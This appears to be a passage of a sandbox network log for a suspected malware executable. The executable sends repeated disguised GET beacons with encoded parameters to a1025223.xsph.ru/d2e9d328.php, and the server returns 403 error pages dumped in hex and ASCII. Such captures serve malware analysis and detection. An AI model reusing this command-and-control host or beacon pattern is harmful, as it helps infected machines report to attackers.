                                  Sep 27, 2024 08:42:57.134629965 CEST672INData Raw: 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 6c 6f 6e 67 2d 6c 6f 67 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 31 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72
                                  Data Ascii: ntent .footer__long-logo{max-width:188px;max-height:32px}.wrapper .content .footer__text{color:#000;font-size:14px;line-height:138%;margin-bottom:16px;white-space:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-h
                                  Sep 27, 2024 08:42:57.134641886 CEST1236INData Raw: 65 72 2d 78 73 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65
                                  Data Ascii: er-xs{display:block}.wrapper .content .right-side .image-container-md{display:none}.wrapper .content .footer{max-width:328px}.wrapper .content .footer--long{max-width:333px}.wrapper .content .footer__rights{max-width:230px}}@media screen and (
                                  Sep 27, 2024 08:42:57.134654045 CEST1236INData Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 69 67 68 74 2d 73 69 64 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 2d 63 6f 6e 74
                                  Data Ascii: </div> <div class="right-side"> <div class="image-container image-container-md"> <a href="https://index.from.sh/pages/game.html"> <svg width="328" height="384" viewbox="0
                                  Sep 27, 2024 08:42:57.134665012 CEST1236INData Raw: 37 2e 30 31 33 39 43 31 36 38 2e 37 35 20 38 37 2e 35 38 36 37 20 31 36 38 2e 35 35 39 20 38 38 2e 37 33 32 34 20 31 36 37 2e 37 39 34 20 38 39 2e 34 39 36 32 43 31 36 37 2e 34 31 31 20 39 30 2e 30 36 39 31 20 31 36 36 2e 36 34 36 20 38 39 2e 38
                                  Data Ascii: 7.0139C168.75 87.5867 168.559 88.7324 167.794 89.4962C167.411 90.0691 166.646 89.8781 166.072 89.6872C165.116 88.7324 163.968 87.7777 163.012 86.632C162.247 85.8682 161.099 85.1044 160.143 85.2953C159.761 85.2953 159.378 85.2953 158.995 85.486
                                  Sep 27, 2024 08:42:57.134675980 CEST1236INData Raw: 31 38 35 2e 30 30 38 20 38 39 2e 34 39 35 34 20 31 38 36 2e 31 35 35 20 38 39 2e 34 39 35 34 43 31 38 39 2e 37 38 39 20 38 39 2e 33 30 34 35 20 31 39 33 2e 34 32 33 20 38 39 2e 34 39 35 34 20 31 39 36 2e 38 36 36 20 38 39 2e 38 37 37 33 43 31 39
                                  Data Ascii: 185.008 89.4954 186.155 89.4954C189.789 89.3045 193.423 89.4954 196.866 89.8773C197.44 89.8773 197.822 89.4954 197.822 88.9226C197.822 88.3497 197.44 87.9678 196.866 87.9678Z" fill="black"/> <path d="M199.352 96.3699C195.718 94.8423 19
                                  Sep 27, 2024 08:42:57.134686947 CEST1236INData Raw: 20 31 30 31 2e 31 34 35 20 32 32 30 2e 33 39 32 20 39 34 2e 34 36 31 36 43 32 32 31 2e 37 33 20 38 36 2e 30 35 39 38 20 32 32 32 2e 36 38 37 20 37 37 2e 34 36 37 20 32 32 33 2e 30 36 39 20 36 39 2e 30 36 35 32 43 32 32 33 2e 30 36 39 20 36 38 2e
                                  Data Ascii: 101.145 220.392 94.4616C221.73 86.0598 222.687 77.467 223.069 69.0652C223.069 68.8742 223.069 68.8742 223.069 68.8742C227.086 54.553 235.502 41.5683 237.797 26.6742C238.562 26.2923 238.753 25.1466 237.797 24.9557C226.703 22.6643 215.419 25.52
                                  Sep 27, 2024 08:42:57.134697914 CEST1236INData Raw: 37 38 20 38 34 2e 37 38 34 36 20 31 33 36 2e 32 38 43 38 34 2e 32 31 30 38 20 31 33 36 2e 36 36 32 20 38 33 2e 32 35 34 35 20 31 33 37 2e 30 34 33 20 38 33 2e 34 34 35 38 20 31 33 37 2e 38 30 37 56 31 33 37 2e 39 39 38 43 38 33 2e 34 34 35 38 20
                                  Data Ascii: 78 84.7846 136.28C84.2108 136.662 83.2545 137.043 83.4458 137.807V137.998C83.4458 138.38 83.2545 138.762 83.2545 139.144C82.872 140.481 82.872 141.817 83.2545 142.963C83.2545 142.963 83.2545 142.963 83.2545 143.154C83.2545 143.345 83.4458 143.
                                  Sep 27, 2024 08:42:57.140736103 CEST1236INData Raw: 31 33 35 2e 35 31 36 20 39 2e 39 39 39 39 37 20 31 33 35 2e 38 39 38 43 31 33 2e 34 34 32 37 20 31 33 38 2e 33 38 20 31 37 2e 34 35 39 33 20 31 34 30 2e 30 39 39 20 32 31 2e 34 37 35 39 20 31 34 31 2e 34 33 35 43 32 31 2e 34 37 35 39 20 31 34 31
                                  Data Ascii: 135.516 9.99997 135.898C13.4427 138.38 17.4593 140.099 21.4759 141.435C21.4759 141.626 31.2304 151.938 35.247 156.52C42.7063 164.922 50.7394 172.942 59.7289 180.007C63.7455 183.253 67.9533 186.882 73.1174 185.927C76.7515 185.354 86.6973 178.67
                                  Sep 27, 2024 08:42:57.454768896 CEST453OUTGET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/plain
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                  Host: a1025223.xsph.ru
                                  Sep 27, 2024 08:42:57.665817022 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:57 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.949718141.8.194.149803420C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 27, 2024 08:43:20.931432962 CEST488OUTGET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/plain
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                  Host: a1025223.xsph.ru
                                  Connection: Keep-Alive
                                  Sep 27, 2024 08:43:21.620825052 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:43:21 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                                  Sep 27, 2024 08:43:21.620845079 CEST1236INData Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                                  Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
                                  Sep 27, 2024 08:43:21.620876074 CEST1236INData Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61
                                  Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
                                  Sep 27, 2024 08:43:21.620887041 CEST1236INData Raw: 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 6c 6f 6e 67 2d 6c 6f 67 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 31 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72
                                  Data Ascii: ntent .footer__long-logo{max-width:188px;max-height:32px}.wrapper .content .footer__text{color:#000;font-size:14px;line-height:138%;margin-bottom:16px;white-space:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-h
                                  Sep 27, 2024 08:43:21.620907068 CEST1236INData Raw: 31 30 30 70 78 7d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e
                                  Data Ascii: 100px}}</style></head><body> <div class="wrapper"> <div class="content"> <div class="left-side"> <div class="error-block"> <p class="error-bl
                                  Sep 27, 2024 08:43:21.620920897 CEST1236INData Raw: 32 20 37 33 2e 30 37 33 38 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 39 36 2e 32 39 32 20 36 34 2e 36 37 32 35 43 31 39 35 2e 33 33 36 20 36 38 2e 31 30 39 36 20 31 39 32 2e 32
                                  Data Ascii: 2 73.0738Z" fill="black"/> <path d="M196.292 64.6725C195.336 68.1096 192.276 70.401 189.024 71.3558C184.816 72.5015 180.226 71.3558 176.209 69.8282C175.062 69.4463 174.488 71.3558 175.636 71.7377C180.226 73.2653 185.199 74.602 189.98 7
                                  Sep 27, 2024 08:43:21.620933056 CEST1236INData Raw: 31 39 33 20 31 30 32 2e 36 37 32 43 31 37 33 2e 33 34 20 31 30 33 2e 30 35 34 20 31 37 33 2e 39 31 34 20 31 30 31 2e 31 34 34 20 31 37 32 2e 37 36 37 20 31 30 30 2e 37 36 32 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20
                                  Data Ascii: 193 102.672C173.34 103.054 173.914 101.144 172.767 100.762Z" fill="black"/> <path d="M141.208 97.1331C138.721 99.8064 136.044 102.098 133.175 104.389C132.792 104.771 132.792 105.344 133.175 105.726C133.557 106.108 134.131 106.108 134.5
                                  Sep 27, 2024 08:43:21.620943069 CEST1236INData Raw: 2e 38 31 36 20 31 31 31 2e 36 34 37 20 33 31 31 2e 32 34 32 20 31 31 31 2e 30 37 34 20 33 31 30 2e 36 36 39 20 31 31 30 2e 38 38 33 43 33 30 38 2e 37 35 36 20 31 31 30 2e 36 39 32 20 33 30 37 2e 30 33 35 20 31 31 30 2e 35 30 31 20 33 30 35 2e 31
                                  Data Ascii: .816 111.647 311.242 111.074 310.669 110.883C308.756 110.692 307.035 110.501 305.122 110.31C306.652 108.974 308.182 107.446 309.521 105.728C309.904 105.155 309.33 104.2 308.756 104.2C305.313 104.2 301.87 104.964 298.619 106.3C298.619 106.3 296
                                  Sep 27, 2024 08:43:21.620954037 CEST1236INData Raw: 31 34 37 2e 39 30 32 20 33 35 2e 34 35 37 39 20 31 34 37 2e 39 30 32 20 33 32 2e 32 31 31 38 43 31 34 37 2e 39 30 32 20 33 31 2e 34 34 38 20 31 34 36 2e 37 35 35 20 33 30 2e 38 37 35 31 20 31 34 36 2e 31 38 31 20 33 31 2e 34 34 38 43 31 34 32 2e
                                  Data Ascii: 147.902 35.4579 147.902 32.2118C147.902 31.448 146.755 30.8751 146.181 31.448C142.547 35.8398 137.956 39.086 132.983 41.9502C130.688 43.2869 128.202 44.6235 125.715 45.9602C123.42 47.2969 121.316 48.6335 118.83 49.2064C118.83 49.2064 117.108 4
                                  Sep 27, 2024 08:43:21.620970964 CEST1236INData Raw: 2e 39 35 31 38 20 31 31 37 2e 39 34 38 20 33 32 2e 37 36 30 35 20 31 32 31 2e 31 39 35 43 33 32 2e 37 36 30 35 20 31 32 31 2e 31 39 35 20 33 32 2e 35 36 39 32 20 31 32 31 2e 31 39 35 20 33 32 2e 35 36 39 32 20 31 32 31 2e 30 30 34 43 32 38 2e 39
                                  Data Ascii: .9518 117.948 32.7605 121.195C32.7605 121.195 32.5692 121.195 32.5692 121.004C28.9352 119.667 25.1099 119.094 21.2846 118.903C20.3283 118.903 19.372 118.903 18.4156 118.903C17.6506 118.903 16.8855 119.285 16.503 120.049C16.3117 120.813 16.6942
                                  Sep 27, 2024 08:43:21.625768900 CEST1236INData Raw: 31 39 20 31 37 39 2e 30 35 33 20 31 30 32 2e 35 37 32 20 31 37 38 2e 38 36 32 43 31 30 37 2e 35 34 35 20 31 37 35 2e 36 31 35 20 31 31 31 2e 39 34 34 20 31 37 32 2e 37 35 31 20 31 31 36 2e 37 32 36 20 31 36 39 2e 31 32 33 43 31 31 36 2e 37 32 36
                                  Data Ascii: 19 179.053 102.572 178.862C107.545 175.615 111.944 172.751 116.726 169.123C116.726 172.942 115.196 190.319 114.048 198.911C114.239 199.675 113.857 203.494 113.283 205.786C112.327 211.514 111.37 217.243 110.223 222.971C109.075 228.318 107.736 2
                                  Sep 27, 2024 08:43:21.854018927 CEST464OUTGET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/plain
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                  Host: a1025223.xsph.ru
                                  Sep 27, 2024 08:43:22.065361023 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:43:21 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.949719141.8.194.149804460C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 27, 2024 08:43:35.265680075 CEST600OUTGET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/csv
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                  Host: a1025223.xsph.ru
                                  Connection: Keep-Alive
                                  Sep 27, 2024 08:43:36.033165932 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:43:35 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                                  Sep 27, 2024 08:43:36.033195019 CEST224INData Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                                  Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inlin
                                  Sep 27, 2024 08:43:36.033206940 CEST1236INData Raw: 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d
                                  Data Ascii: e-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wra
                                  Sep 27, 2024 08:43:36.033217907 CEST1236INData Raw: 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72
                                  Data Ascii: webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-m
